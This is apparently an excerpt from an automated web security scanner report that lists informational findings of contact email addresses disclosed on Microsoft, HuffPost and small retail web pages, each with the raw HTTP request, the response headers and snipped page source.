<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.18. http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/ISC/tabid/341/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/ISC/tabid/341/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28904
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.19. http://microsoftcambridge.com/Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20415
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.20. http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/MicrosoftOnlineServices/tabid/175/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/MicrosoftOnlineServices/tabid/175/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21151
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.21. http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/MicrosoftResearch/tabid/81/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/MicrosoftResearch/tabid/81/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21228
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.22. http://microsoftcambridge.com/Teams/SharePointWorkspace/tabid/455/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/SharePointWorkspace/tabid/455/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/SharePointWorkspace/tabid/455/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20568
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.23. http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31800
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.24. http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/UnifiedCommunications/tabid/102/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/UnifiedCommunications/tabid/102/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29668
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:30 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.25. http://microsoftcambridge.com/Teams/tabid/55/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/tabid/55/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/tabid/55/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20312
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.26. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 26 Mar 2011 01:40:21 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Thu, 17 Feb 2011 20:36:42 GMT
Content-Length: 67819

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...
23.27. http://my-happyfeet.com/cart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The following email address was disclosed in the response:

Request

POST /cart.asp HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/proddetail.asp?prod=0001
Content-Length: 42
Cache-Control: max-age=0
Origin: http://my-happyfeet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

optn0=84&quant=1&id=0001&mode=add&x=31&y=9

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:46:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 18098
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="reply-to" content="info@myhappyfeetcolors.com">
...[SNIP]...
23.28. http://my-happyfeet.com/proddetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /proddetail.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /proddetail.asp?prod=0001 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 41348
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="reply-to" content="info@myhappyfeetcolors.com">
...[SNIP]...
23.29. http://office.microsoft.com/en-us/sharepoint-workspace/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://office.microsoft.com
Path:   /en-us/sharepoint-workspace/

Issue detail

The following email address was disclosed in the response:

Request

GET /en-us/sharepoint-workspace/ HTTP/1.1
Host: office.microsoft.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; awsuserguid=guid=555d7aa3-a6f7-4e86-8d0a-2b83cddf17e8; _DetectCookies=Y; ul=1; WT_NVR=0=/:1=en-us:2=en-us/sharepoint-workspace|en-us/sharepoint-designer-help; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093020097:ss=1301092848759; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="ADM CAO CONi COR CUR DEV DSP IND OTRi OUR PSA PUBi STA STP"
SPRequestGuid: ccda36ed-7165-4810-be74-2cc0efb6874a
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=8
X-LLCC: en-US
X-Machine: SN1REN106
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.4762
Date: Sat, 26 Mar 2011 01:44:33 GMT
Content-Length: 46021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
"\nPhone: " + document.getElementById('phoneNumber').value + "\ncontent Type: " + ChosenContentType + "\nLink To Your Content: " + document.getElementById('LinkTo').value;
var email = "ocs@microsoft.com";
var subject = "Office.com Content and Services partnership inquiry";

window.location = 'mailto:' + encodeURIComponent(email) + '?subject=' + encodeURIComponent(subject
...[SNIP]...
23.30. http://s.huffpost.com/assets/js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.huffpost.com
Path:   /assets/js.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&v44499 HTTP/1.1
Host: s.huffpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Date: Sat, 26 Mar 2011 20:36:02 GMT
Content-Length: 632001
Connection: close

/* From: app1-nyc : 7779 */
(function(root){root.huff=({init:function(){this.jquery=jQuery.noConflict();this.events={};this.modules={};this.versions={};this.loading={};this.styles={};var t=this;window
...[SNIP]...
Pstream.social_first_load)
SNPstream.feedback_show('This social profile failed to load. Our team has been alerted of this error and we\'ll be looking into it right away. Please also feel free to email socialnews@huffingtonpost.com with any additional information or feedback.',null,false);SNPstream.feedback_hide_image();}
return;}
document.documentElement.scrollTop-=10;SNPstream.social_c_request++;if(o.user)
{user=o.user;if(user
...[SNIP]...
<a href="mailto:beta@huffingtonpost.com">beta@huffingtonpost.com</a>
...[SNIP]...
23.31. http://technet.microsoft.com/en-us/magazine/gg670984.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/magazine/gg670984.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en-us/magazine/gg670984.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 